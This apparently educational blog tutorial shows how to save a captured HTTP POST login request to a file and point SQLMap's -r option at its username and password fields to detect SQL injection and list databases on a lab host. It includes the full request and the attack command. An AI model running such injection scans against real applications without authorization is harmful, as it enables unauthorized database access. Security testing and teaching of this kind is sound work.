SCIENCEAuthor: Arnel C. Reyes
Published: 30 July 2024
Last Updated: 31 July 2024
SQLMap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection vulnerabilities in web applications. It is one of the most popular tools used by security professionals for identifying and leveraging SQL injection points to gain unauthorized access to databases.
What is a Post Request?
In web applications, a POST request is used to send data to the server to create/update a resource. The data sent to the server is stored in the request body of the HTTP request. SQLMap can be used to test POST requests to identify SQL injection vulnerabilities by sending malicious payloads in the request body.
What is a Request File?
A request file contains the entire HTTP request, including the request line, headers, and body. This file is typically captured using tools like Burp Suite, OWASP ZAP, or even by saving HTTP requests from browser developer tools.
Steps to Use SQLMap with a Request File
- Capture the Request using a tool like Burp Suite or OWASP ZAP to capture the full HTTP request.
» Consider that the following request have captured:
POST /index.php?page=login.php HTTP/1.1
Host: 192.168.1.18
Cookie: PHPSESSID=7f5i8fc4eke2pckj7o38gdks58; showhints=1
Content-Length: 65
Cache-Control: max-age=0
Sec-Ch-Ua: "Not/A)Brand";v="8", "Chromium";v="126"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
Origin: https://192.168.1.18
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://192.168.1.18/index.php?page=login.php
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive
username=username&password=password&login-php-submit-button=Login - Save the captured request to a file (e.g., 'post-request.txt').
- Run SQLMap with the '-r' option to specify the request file.
» Execute SQLMap with the following command using the '-r' option, simply specify the request file as follows::
$ python sqlmap.py -r post-request.txt -p username,password --dbs --dbms="MySQL" --output-dir=output
Output:
Conclusion
Using SQLMap to test POST requests for SQL injection vulnerabilities is a critical aspect of web application security testing. By automating the process, SQLMap allows security professionals to efficiently identify and exploit SQL injection points, helping to ensure the robustness of web applications against such attacks. Using the `-r` option in SQLMap is a powerful method for testing complex HTTP requests for SQL injection vulnerabilities. By capturing and using the full HTTP request, security professionals can ensure that all aspects of the request are accurately tested, improving the chances of identifying potential vulnerabilities. Always ensure that proper authorization before testing any web application to avoid legal consequences.
Reference
https://sqlmap.org
Disclaimer: This documentation is intended for educational purposes only. The content provided herein is meant to inform and educate individuals about security practices, techniques, and tools. Security-Science does not support, endorse, or encourage any illegal or unethical activities, including but not limited to unauthorized access to computer systems, networks, or data. Users are advised to apply the knowledge gained responsibly and ensure compliance with all applicable laws and regulations. Security-Science shall not be held liable for any misuse of the information provided.